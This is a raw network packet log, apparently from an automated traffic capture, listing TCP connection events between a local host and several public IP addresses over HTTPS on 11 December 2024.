                                                                              Dec 11, 2024 15:19:44.294651985 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.294661999 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.297621965 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.297683001 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.297718048 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.305414915 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.305480957 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.305522919 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.319323063 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.319401026 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.319458961 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.326283932 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.326342106 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.326383114 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.357999086 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.358058929 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.358095884 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.358146906 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.358198881 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.361428976 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.361517906 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.361568928 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.361689091 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.361710072 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.361721039 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.361756086 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.685868025 CET44349709142.250.181.68192.168.2.16
                                                                              Dec 11, 2024 15:19:44.685935020 CET44349709142.250.181.68192.168.2.16
                                                                              Dec 11, 2024 15:19:44.685978889 CET49709443192.168.2.16142.250.181.68
                                                                              Dec 11, 2024 15:19:45.312345028 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.312936068 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.312975883 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.313296080 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.313868046 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.313868046 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.313888073 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.313935041 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.366794109 CET49673443192.168.2.16204.79.197.203
                                                                              Dec 11, 2024 15:19:45.366796017 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.511552095 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.512109995 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.512126923 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.512506008 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.512938023 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.512938023 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.512953997 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.513015985 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.557255983 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.757633924 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.757772923 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.757807016 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.757940054 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.757946968 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.757996082 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.758038044 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.758488894 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.759202003 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.759207964 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.766096115 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.766231060 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.766247034 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.782814980 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.783340931 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.783370972 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.828798056 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.877633095 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.924580097 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.924604893 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.954165936 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.954278946 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.954305887 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.962137938 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.962213039 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.962222099 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.970134020 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.970201969 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.970210075 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.971385002 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.971477985 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.971529961 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.972209930 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.972227097 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.974709034 CET49709443192.168.2.16142.250.181.68
                                                                              Dec 11, 2024 15:19:45.974733114 CET44349709142.250.181.68192.168.2.16
                                                                              Dec 11, 2024 15:19:45.975052118 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.975096941 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.975186110 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.975413084 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.975428104 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.978327990 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.978395939 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.978404999 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.986253023 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.986311913 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.986319065 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.994312048 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:45.994369030 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:45.994376898 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.002310991 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.002372026 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.002381086 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.010512114 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.010606050 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.010617018 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.024578094 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.024751902 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.024753094 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.024765968 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.024817944 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.031074047 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.037564993 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.037719011 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.037729979 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.084064007 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.142432928 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.145193100 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.145271063 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.145296097 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.149466991 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.149544954 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.149568081 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.158655882 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.158751011 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.158768892 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.163856030 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.163922071 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.163930893 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.163985014 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.172568083 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.172574997 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.172688961 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.172708035 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.172758102 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.181062937 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.181070089 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.181158066 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.189558983 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.189661026 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.198090076 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.198204994 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.202745914 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.202831030 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.211370945 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.211456060 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.335285902 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.335391998 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.340874910 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.340940952 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.344696999 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.344770908 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.351294994 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.351370096 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.358242989 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.358313084 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.362194061 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.362380028 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.365442991 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.365505934 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.365518093 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.365544081 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.365593910 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.365665913 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.365683079 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.365691900 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.365730047 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.368033886 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.368073940 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.368153095 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.368391037 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.368406057 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.381582975 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:46.381640911 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:46.381721973 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:46.382035971 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:46.382054090 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:46.508095980 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.508128881 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:46.508225918 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.508419037 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:46.508431911 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.271183968 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.271612883 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:47.271644115 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.271966934 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.272248030 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:47.272310019 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.272372007 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:47.319333076 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.784820080 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.785177946 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.785206079 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.786235094 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.786315918 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.786676884 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.786695957 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.786739111 CET44349726104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.786753893 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.786808014 CET49726443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.787086010 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.787136078 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.787298918 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.787498951 CET49728443192.168.2.16104.21.86.90
                                                                              Dec 11, 2024 15:19:47.787512064 CET44349728104.21.86.90192.168.2.16
                                                                              Dec 11, 2024 15:19:47.905587912 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.905693054 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:47.905771017 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:47.906569004 CET49724443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:47.906615019 CET44349724104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.011854887 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.012156010 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.012168884 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.012556076 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.012866020 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.012938023 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.013056040 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.013102055 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.013113976 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.038333893 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.038609982 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.038620949 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.038943052 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.039232016 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.039299011 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.039359093 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.083344936 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.399190903 CET4968080192.168.2.16192.229.211.108
                                                                              Dec 11, 2024 15:19:48.499392986 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.499460936 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.499504089 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.499550104 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.499574900 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.499602079 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.499619961 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.506160975 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.506264925 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.506273985 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.514411926 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.514503956 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.514523029 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.522833109 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.522908926 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.522917986 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.545842886 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.545896053 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.545928955 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.545960903 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.545964956 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.545985937 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.546010971 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.554246902 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.554343939 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.554368019 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.564749002 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.564847946 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.564857006 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.573105097 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.573112965 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.620083094 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.620083094 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.620100975 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.620115995 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.666163921 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.666269064 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.666295052 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.668077946 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.687398911 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.692282915 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.692401886 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.692435026 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.699203968 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.699269056 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.699299097 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.706041098 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.706137896 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.706167936 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.715105057 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.715132952 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.721616983 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.721647024 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.721734047 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.721754074 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.721798897 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.728936911 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.736753941 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.736880064 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.736908913 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.742285013 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.742398977 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.742432117 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.744383097 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.744411945 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.744460106 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.744486094 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.744529963 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.750377893 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.750480890 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.750509024 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.752043962 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.758054972 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.758145094 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.758171082 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.760489941 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.760550976 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.760570049 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.766592979 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.766681910 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.766706944 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.767417908 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.767467022 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.767478943 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.774960995 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.774974108 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.775051117 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.775068998 CET44349725104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.775084972 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.775091887 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.782320976 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.782407045 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.782423019 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.791433096 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.791517019 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.791542053 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.805943966 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.806071043 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.806102991 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.812457085 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.812624931 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.812635899 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.818929911 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.819013119 CET49727443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.819020987 CET44349727104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:48.822067976 CET49725443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:48.822092056 CET44349725104.18.95.41192.168.2.16
